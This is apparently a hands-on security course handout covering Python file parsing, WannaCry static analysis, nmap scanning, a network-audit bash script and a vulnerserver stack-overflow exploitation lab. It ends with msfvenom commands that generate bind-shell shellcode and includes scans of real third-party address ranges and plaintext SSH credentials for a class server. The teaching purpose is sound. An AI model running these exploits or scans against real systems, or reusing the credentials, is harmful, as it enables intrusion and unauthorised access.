Norway Cyber Security 2019

                            #########################################################
----------- ############### # Day 1: Python Fundamentals & File Parsing with Python # ############### -----------
                            #########################################################


#####################
# Installing Python #
#####################
Windows

https://www.python.org/downloads/

32-Bit Version
https://www.python.org/ftp/python/3.7.3/python-3.7.3-webinstall.exe

64-Bit Version
https://www.python.org/ftp/python/3.7.3/python-3.7.3-amd64-webinstall.exe


After you install Python in Windows the next thing you may want to install is IdleX:
http://idlex.sourceforge.net/features.html

---------------------------Type This-----------------------------------

Linux
Debian/Ubuntu:      sudo apt-get install -y python
RHEL/CentOS/Fedora: sudo yum install -y python

-----------------------------------------------------------------------


After you install Python in Linux the next thing that you will need to do is install idle.

---------------------------Type This-----------------------------------

sudo apt-get install -y idle

-----------------------------------------------------------------------

Open IDLE, and let's just dive right in.


- I prefer to use Putty to SSH into my Linux host.
- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into putty

Host Name:          108.61.216.188
protocol:           ssh
port:               22
username:           usn
password:           norway!cybersecurity!


####################################
# Python Lesson 1: Simple Printing #
####################################

---------------------------Type This-----------------------------------
$ python3

>>> print ("Today we are learning Python.")

>>> exit()
-----------------------------------------------------------------------


############################################
# Python Lesson 2: Simple Numbers and Math #
############################################

---------------------------Type This-----------------------------------
$ python3

>>> 2+2

>>> 6-3

>>> 18/7

>>> 18.0/7

>>> 18.0/7.0

>>> 18/7

>>> 9%4
1
>>> 8%4
0
>>> 8.75%.5

>>> 6.*7

>>> 7*7*7

>>> 7**3

>>> 5**12

>>> -5**4

>>> exit()

-----------------------------------------------------------------------


##############################
# Python Lesson 3: Variables #
##############################

---------------------------Type This-----------------------------------
$ python3

>>> x=18

>>> x+15

>>> x**3

>>> y=54

>>> g=int(input("Enter number here: "))
Enter number here: 43
>>> g

>>> g+32

>>> g**3

>>> exit()

-----------------------------------------------------------------------


##########################################
# Python Lesson 4: Modules and Functions #
##########################################

---------------------------Type This-----------------------------------
$ python3

>>> 5**4

>>> pow(5,4)

>>> abs(-18)

>>> abs(5)

>>> floor(18.7)

>>> import math

>>> math.floor(18.7)

>>> math.ceil(18.7)

>>> math.sqrt(81)

>>> joe = math.sqrt

>>> joe(9)

>>> joe=math.floor

>>> joe(19.8)

>>> exit()

-----------------------------------------------------------------------


############################
# Python Lesson 5: Strings #
############################

---------------------------Type This-----------------------------------
$ python3

>>> "XSS"

>>> 'SQLi'

>>> "Joe's a python lover"

>>> "Joe said \"InfoSec is fun\" to me"

>>> a = "Joe"

>>> b = "McCray"

>>> a, b

>>> a+b

>>> exit()
-----------------------------------------------------------------------


#################################
# Python Lesson 6: More Strings #
#################################

---------------------------Type This-----------------------------------
$ python3

>>> num = 10

>>> num + 2

>>> "The number of open ports found on this system is ",  num

>>> num = str(18)

>>> "There are ", num, " vulnerabilities found in this environment."

>>> num2 = 46

>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is ", + num2

>>> exit()
-----------------------------------------------------------------------


########################################
# Python Lesson 7: Sequences and Lists #
########################################

---------------------------Type This-----------------------------------
$ python3

>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks[3]
'SQL Injection'

>>> attacks[-2]
'Cross-Site Scripting'

>>> exit()


------------------------------- Summary of fundamentals -------------------------------


Joe rule #1 single quote, single quote, left arrow
--------------------------------------------------
'' <-- as soon as you type '', then hit your left arrow key to put you inside of the ''
"" <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
something() <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
something[] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
something{} <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}

-- Now kick it up a notch
[]  <-- as soon as you type [], then hit your left arrow key to put you inside of the []
[()] <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
[({})] <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
[({"''"})] <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
[({"''"})] <-- as soon as you type '', then hit your left arrow key to put you inside of the ''


Joe rule #2 "Code can only do 3 things"
--------------------------------------

Process     -   read, write, math

Decision    -   if/then

Loop        -   for


Joe rule #3 "Never more than 5-10"
---------------------------------

-----5 lines of code----
line 1 blah blah blah
line 2 blah blah blah
line 3 blah blah blah
line 4 blah blah blah
line 5 blah blah blah


    sales_tax   =   price       *   tax_rate


    0.80        =   10      *   0.08

-----5-10 lines of code---- = function
    price = 10

    def st():
        sales_tax = price * 0.08
        print(sales_tax)


st(10) <---- how to run a function

-----5-10 functions ---- = class   "tax class"
st()
lt()
pt()
it()
dt()


tax.st()
tax.lt()

-----5-10 functions ---- = class   "expense class"
gas()
elec()
water()
food()
beer()

expense.gas()


-----5-10 classes ---- = module   "finance module"

import finance


------------------------------- Summary of fundamentals -------------------------------

##################################
# Lesson 8: Intro to Log Analysis #
##################################


Log into your Linux host then execute the following commands:
-----------------------------------------------------------------------
NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.


---------------------------Type This-----------------------------------
mkdir yourname          <---- Use your actual first name (all lowercase and no spaces) instead of the word yourname

cd yourname

wget http://pastebin.com/raw/85zZ5TZX

mv 85zZ5TZX access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.188 | wc -l

cat access_log | grep 141.101.80.187

cat access_log | grep 141.101.80.187 | wc -l

cat access_log | grep 108.162.216.204

cat access_log | grep 108.162.216.204 | wc -l

cat access_log | grep 173.245.53.160

cat access_log | grep 173.245.53.160 | wc -l

----------------------------------------------------------------------


###############################################################
# Python Lesson 9: Use Python to read in a file line by line  #
###############################################################


---------------------------Type This-----------------------------------

nano logread1.py


---------------------------Paste This-----------------------------------
## Open the file with read only permit
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print (lines)


## close the file after reading the lines.
f.close()

----------------------------------------------------------------------


---------------------------Type This-----------------------------------
$ python3 logread1.py
----------------------------------------------------------------------


Google the following:
    - python difference between readlines and readline
    - python readlines and readline


Here is one student's solution - can you please explain each line of this code to me?


---------------------------Type This-----------------------------------
nano ip_search.py


---------------------------Paste This-----------------------------------
#!/usr/bin/env python3

f = open('access_log')

strUsrinput = input("Enter IP Address: ")

for line in iter(f):
   ip = line.split(" - ")[0]
   if ip == strUsrinput:
       print (line)

f.close()


----------------------------------------------------------------------


---------------------------Type This-----------------------------------
$ python3 ip_search.py
----------------------------------------------------------------------


Working with another student after class we came up with another solution:

---------------------------Type This-----------------------------------
nano ip_search2.py

---------------------------Paste This-----------------------------------
#!/usr/bin/env python3


# This line opens the log file
f=open('access_log',"r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()


# This lines stores the IP that the user types as a var called userinput
userinput = input("Enter the IP you want to search for: ")


# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
   if ip.find(userinput) != -1:
       print (ip)

----------------------------------------------------------------------


---------------------------Type This-----------------------------------
$ python3 ip_search2.py
----------------------------------------------------------------------


################################
# Lesson 10: Parsing CSV Files #
################################

Type the following commands:
---------------------------------------------------------------------------------------------------------

---------------------------Type This-----------------------------------

wget http://45.63.104.73/class_nessus.csv

----------------------------------------------------------------------

Example 1 - Reading CSV files
-----------------------------
#To be able to read csv formated files, we will first have to import the
#csv module.


---------------------------Type This-----------------------------------
$ python3
f = open('class_nessus.csv', 'r')
for row in f:
   print (row)


----------------------------------------------------------------------


Example 2 - Reading CSV files
-----------------------------

---------------------------Type This-----------------------------------

nano readcsv.py

---------------------------Paste This-----------------------------------
#!/usr/bin/env python3
f = open('class_nessus.csv', 'r')      # opens the csv file
try:
    for row in f:                       # iterates the rows of the file in orders
        print (row)                     # prints each row
finally:
    f.close()                           # closing


----------------------------------------------------------------------


Ok, now let's run this thing.

--------------------------Type This-----------------------------------
$ python3 readcsv.py

----------------------------------------------------------------------


Example 3 - - Reading CSV files
-------------------------------

---------------------------Type This-----------------------------------

nano readcsv2.py

---------------------------Paste This-----------------------------------
#!/usr/bin/python3
# This program will then read it and displays its contents.

import csv

ifile  = open('class_nessus.csv', "r")
reader = csv.reader(ifile)

rownum = 0
for row in reader:
    # Save header row.
    if rownum == 0:
        header = row
    else:
        colnum = 0
        for col in row:
            print ('%-8s: %s' % (header[colnum], col))
            colnum += 1

    rownum += 1

ifile.close()


----------------------------------------------------------------------


---------------------------Type This-----------------------------------

$ python3 readcsv2.py | less


----------------------------------------------------------------------


---------------------------Type This-----------------------------------

nano readcsv3.py

---------------------------Paste This-----------------------------------
#!/usr/bin/python3
import csv
f = open('class_nessus.csv', 'r')
try:
    rownum = 0
    reader = csv.reader(f)
    for row in reader:
         #Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high':
                print ('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]))
        rownum += 1
finally:
    f.close()

-----------------------------------------------------------------------


---------------------------Type This-----------------------------------

$ python3 readcsv3.py | less
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------

nano readcsv4.py
-----------------------------------------------------------------------

---------------------------Paste This-----------------------------------

#!/usr/bin/python3
import csv
f = open('class_nessus.csv', 'r')
try:
    print ('/---------------------------------------------------/')
    rownum = 0
    hosts = {}
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high' and row[4] not in hosts:
                hosts[row[4]] = row[4]
                print ('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]))
        rownum += 1
finally:
    f.close()
----------------------------------------------------------------------


$ python3 readcsv4.py | less

----------------------------------------------------------------------


                            #######################################
----------- ############### # Day 1: Malware analysis with Python # ############### -----------
                            #######################################
Here is the information to put into putty

Host Name:          108.61.216.188
protocol:           ssh
port:               22
username:           usn
password:           norway!cybersecurity!


cd ~/yourname

wget http://45.63.104.73/wannacry.zip

unzip wannacray.zip
     **** password is infected ***

file wannacry.exe

objdump -x wannacry.exe

strings wannacry.exe

strings --all wannacry.exe | head -n 6

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list


-------------------------------------------------------------------------------------------


Indicators of Compromise (IoC)
-----------------------------

1. Modify the filesystem
2. Modify the registry          - ADVAPI32.dll (persistance)
3. Modify processes/services
4. Connect to the network       - WS2_32.dll


if you can't detect a registry change across 5% of your network


EDR Solution
------------


1. Static Analysis  <----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
    - Modify FS                     - File integrity checker
    - Modify registry
    - Modify processes/services
    - Connect to the network


2. Dynamic Analysis
Runs the file in a VM/Sandbox

################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).


The fastest thing you can do is perform static analysis.


Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomeware analysis"


Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -


Strings:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
$s2 = “Wanna Decryptor” wide ascii nocase
$s3 = “.wcry” wide ascii nocase
$s4 = “WANNACRY” wide ascii nocase
$s5 = “WANACRY!” wide ascii nocase
$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase


Ok, let's look for the individual strings

---------------------------Type This-----------------------------------


strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry          **** Matches $s5, hmmm.....


-----------------------------------------------------------------------


####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future.


---------------------------Type This-----------------------------------
cd ~/yourname
cp ../am.py .
nano am.py
-----------------------------------------------------------------------


This is a really good script for the basics of static analysis

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html


This is really good for showing some good signatures to add to the Python script that I wrote


---------------------------Type This-----------------------------------
python3 am.py wannacry.exe
-----------------------------------------------------------------------


##############
# Class task #
##############
Go to these websites:
https://joesecurity.org/joe-sandbox-reports
https://github.com/Yara-Rules/rules

As a class you must do the following:
1. Come up with 3 types of attacks that you want to update my am.py script to look for
2. Identify the signatures that you think would be best for finding these types of attacks and why
3. Update the am.py script to accomplish this task


                            #################################
----------- ############### # Day 2: Software Exploitation  # ############### -----------
                            #################################

########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type this command-----------------------------------
sudo nmap -sP 157.166.226.*
-------------------------------------------------------------------------------


    -if -SP yields no results try:
---------------------------Type this command-----------------------------------
sudo nmap -sL 157.166.226.*
-------------------------------------------------------------------------------


    -Look for hostnames:
---------------------------Type this command-----------------------------------
sudo nmap -sL 157.166.226.* | grep cnn
-------------------------------------------------------------------------------


- Port Scan
What's where?
------------
---------------------------Type this command-----------------------------------
sudo nmap -sS 162.243.126.247
-------------------------------------------------------------------------------


- Bannergrab/Version Query
What versions of software are running
-------------------------------------

---------------------------Type this command-----------------------------------
sudo nmap -sV 162.243.126.247
-------------------------------------------------------------------------------


- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
https://www.exploit-db.com/search
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/


Network Penetration Testing Process (known vulnerabilities)
-----------------------------------------------------------


1. Ping Sweep:
The purpose of this step is to identify live hosts

    nmap -sP <ip-address/ip-range>


2. Port Scan
Identify running services. We use the running services to map the network topology.

    nmap -sS <ip-address/ip-range>


3. Bannergrab
Identify the version of version of software running on each port

    nmap -sV <ip-address/ip-range>


4. Vulnerability Research
Use the software version number to research and determine if it is out of date (vulnerable).

    exploit-db.com/search


####################
# Day 2 Class Task #
####################
As a class you must do the following:
1. Understand the logic of the shell script below
2. Verify that this shell script runs against the target network
3. Port this shell script to Python3

Some resources that you may find helpful are:
https://www.studytonight.com/network-programming-in-python/integrating-port-scanner-with-nmap
https://github.com/rikosintie/nmap-python
https://xael.org/pages/python-nmap-en.html
https://xael.org/pages/python-nmap-en.html


-----------------------------------------------------------------------
#!/bin/bash
#############################################
# Check to see if script is running as root #
#############################################
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
  exit
fi


####################################
# Check to see if gcc is installed #
####################################
file1="/usr/bin/gcc"
if [ -f "$file1" ]
then
    echo "$file is installed."
    clear
else
    echo "$file not found."
    echo Installing gcc
    apt-get install -y gcc
    clear
fi

########################
# Make the directories #
########################
cd /tmp
rm -rf customerAudit/
rm -rf NetworkAudit/
mkdir -p /tmp/NetworkAudit/discovered_services/
mkdir -p /tmp/NetworkAudit/scan/windows/
mkdir -p /tmp/NetworkAudit/scan/sunrpc/
mkdir -p /tmp/NetworkAudit/scan/ssh/
mkdir -p /tmp/NetworkAudit/scan/ftp/
mkdir -p /tmp/NetworkAudit/scan/http/
mkdir -p /tmp/NetworkAudit/scan/telnet/
mkdir -p /tmp/NetworkAudit/scan/pop3/
mkdir -p /tmp/NetworkAudit/scan/printers/
mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/


#####################
# Download propecia #
#####################
file2="/bin/propecia"
if [ -f "$file2" ]
then
    echo "$file is installed."
    clear
else
    echo "$file not found."
    echo Installing propecia
    cd /tmp
    wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
    gcc propecia.c -o propecia
    cp propecia /bin
fi

######################
# Find Windows Hosts #
######################
clear
echo "Scanning for windows hosts."
propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
clear
echo "Done scanning for windows hosts. FTP is next."


##################
# Find FTP Hosts #
##################
echo "Scanning for hosts running FTP."
propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
clear
echo "Done scanning for FTP hosts. SSH is next."

##################
# Find SSH Hosts #
##################
echo "Scanning for hosts running SSH."
propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
clear
echo "Done scanning for SSH hosts. POP3 is next."


###################
# Find POP3 Hosts #
###################
echo "Scanning for hosts running POP3."
propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
clear
echo "Done scanning for POP3 hosts. SunRPC is next."


#####################
# Find SunRPC Hosts #
#####################
echo "Scanning for hosts running SunRPC."
propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
clear
echo "Done scanning for SunRPC hosts. Telnet is next."


#####################
# Find Telnet Hosts #
#####################
echo "Scanning for hosts running Telnet."
propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
clear
echo "Done scanning for Telnet hosts. HTTP is next."


###################
# Find HTTP Hosts #
###################
echo "Scanning for hosts running HTTP"
propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
clear
echo "Done scanning for HTTP hosts. HTTPS hosts are next."


###################
# Find HTTPS Hosts #
###################
echo "Scanning for hosts running HTTP"
propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
clear
echo "Done scanning for HTTPS hosts. Databases are next."


##################
# Find Databases #
##################
echo "Scanning for hosts running MS SQL Server"
propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
clear

echo "Scanning for hosts running Oracle"
propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
clear

echo "Scanning for hosts running Postgres"
propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
clear

echo "Scanning for hosts running MongoDB"
propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
clear

echo "Scanning for hosts running MySQL"
propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
clear
echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."


###############################
# Ok, let's do the NMAP files #
###############################
clear
# Windows
for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
echo "Done with Windows."

clear
# FTP
for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
echo "Done with FTP."

clear
# SSH
for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
echo "Done with SSH."

clear
# SUNRPC
for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
echo "Done with SunRPC."

clear
# POP3
for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg  $x > /tmp/NetworkAudit/scan/pop3/$x ; done
echo "Done with POP3."

# clear
# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."


# clear
# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."


clear
# SQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
echo "Done with MS SQL."

clear
# Oracle Servers
# FIX THIS: needs brute force wordlists for this to run correctly
# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
# echo "Done with Oracle."

clear
# MongoDB
for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info  $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
echo "Done with MongoDB."


clear
# MySQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
echo "Done with MySQL."


# Add postgres nse scripts
# References:
# https://nmap.org/nsedoc/lib/pgsql.html
# https://nmap.org/nsedoc/scripts/pgsql-brute.html
#

echo " "
echo " "
sleep 1
clear
echo "Done, now check your results."
sleep 2
clear
cd /tmp/NetworkAudit/scan/
ls
-----------------------------------------------------------------------


Skill Level 1. Run the scanners
-------------------------------
    Nexpose
    Qualys
    Retina
    Nessus              known vulnerabilities
    OpenVas
    Foundscan
    GFI LanGuard
    NCircle


Skill Level 2. Manual vulnerability validation (known vulnerabilities)
-----------------------------------------------------------------------

    windows ->  systeminfo
    Linux->     dpkg -l
                rpm -qa


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip
http://45.63.104.73/nc-password-is-netcat.zip   <--- save this file to your c:\windows\system32 directory


- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------
nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.


------------------------------


Skill Level 3. Identify unknown vulnerabilities
-----------------------------------------------

- App Type
------------
    Stand Alone             Client Server               Web App

                        ***(vulnerserver.exe)***


- Input TYpe
-------------
    FIle                    logical network port            Browser
    Keyboard
    Mouse


                        ***(9999)***


- Map & Fuzz app entry points:
------------------------------
    - Commands              ***(commands)***
    - Methods
    - Verbs
    - functions
    - subroutines
    - controllers


- Isolate the crash
-------------------
App seems to reliably crash at TRUN 2100


- Calculate the distance to EIP
-------------------------------
Distance to EIP is 2006

We found that EIP was populated with the value: 396F4338
396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern

An online tool that we can use for this is:
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html


- Redirect Program Execution
----------------------------
A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
We learned that we control EAX and ESP in script 2.


- Implement Shellcode
---------------------
There are only 2 things that can go wrong with shellcode:
- Not enough space
- Bad characters


#######################################################
# Open the following web links below as tabs          #
# For each web link answer all of the questions below #
#######################################################
https://www.exploit-db.com/exploits/46762
https://www.exploit-db.com/exploits/46070
https://www.exploit-db.com/exploits/40713
https://www.exploit-db.com/exploits/46458
https://www.exploit-db.com/exploits/40712
https://www.exploit-db.com/exploits/40714
https://www.exploit-db.com/exploits/40680
https://www.exploit-db.com/exploits/40673
https://www.exploit-db.com/exploits/40681
https://www.exploit-db.com/exploits/37731
https://www.exploit-db.com/exploits/31254
https://www.exploit-db.com/exploits/31255
https://www.exploit-db.com/exploits/27703
https://www.exploit-db.com/exploits/27277
https://www.exploit-db.com/exploits/26495
https://www.exploit-db.com/exploits/24557
https://www.exploit-db.com/exploits/39417
https://www.exploit-db.com/exploits/23243


                       ###############################
###################### # Class Exploit Dev Quiz Task # ######################
                       ###############################
 1. Vulnerable Software Info
    a- Product Name
    b- Software version
    c- Available for download


2. Target platform
    a- OS Name
    b- Service pack
    c- Language pack


3. Exploit info
    a- modules imported                     (ex: sys, re, os)
    b- application entry point              (ex: TRUN)
    c- distance to EIP                      (ex: 2006)
    d- how is code redirection done         (ex: JMP ESP, JMP ESI)
    e- number of NOPs                       (ex: 10 * \x90  = 10 NOPs)
    f- length of shellcode
    g- bad characters                       (ex: \x0a\x00\x0d)
    h- is the target ip hard-coded
    i- what does the shellcode do           (ex: bind shell, reverse shell, calc)
    j- what is the total buffer length
    k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
    l- Is this a server side or client-side exploit


#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################


Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable ‘junk2’


Analysis of the training walk-through based on EID: 15689:
http://45.63.104.73/ff.zip


ff1.py
1. What does the sys module do?
2. What is sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?


ff2.py
1. Explain what is happening in lines 18 - 20 doing.
2. What is pattern_create.rb doing and where can I find it?
3. Why can’t I just double click the file to run this script?


ff3.py
1. Explain what is happening in lines 17 - to 25?
2. Explain what is happening in lines 30 - to 32?
3. Why is everything below line 35 commented out?


ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?


ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?


ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?


ff7.py
1. What is a tuple in python?
2. How big is the shellcode in this script?
3. Did your app crash in from this script?


ff8.py
1. How big is the shellcode in this script?
2. What is try/except in python?
3. What is socket.SOCK_STREAM in Python?


ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. From what DLL did the address of the JMP ESP come from?


ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?


Now copy your working ff010.py script and rename it ff011.py.


Let's get some working shellcode in your new ff011.py script
----------------------------------------------------
Here is the information to put into putty

Host Name:          108.61.216.188
protocol:           ssh
port:               22
username:           sandiego
password:           armexploitdev123!


Calc:
-----

---------------------------Type This------------------------------------
cd /home/sandiego/metasploit/
./msfvenom  -a x86 --platform windows -p windows/exec CMD=calc.exe -b '\x00\x0A\x0x2\x40' -f c -e x86/fsntenv_mov
------------------------------------------------------------------------


Bind Shell
----------

---------------------------Type This------------------------------------
cd /home/sandiego/metasploit/
./msfvenom --list payloads | grep windows | grep bind_tcp
./msfvenom  -a x86 --platform windows -p windows/shell/bind_tcp LPORT=4444 -b '\x00\x09\x0a\x0d\x20\x40' -f c
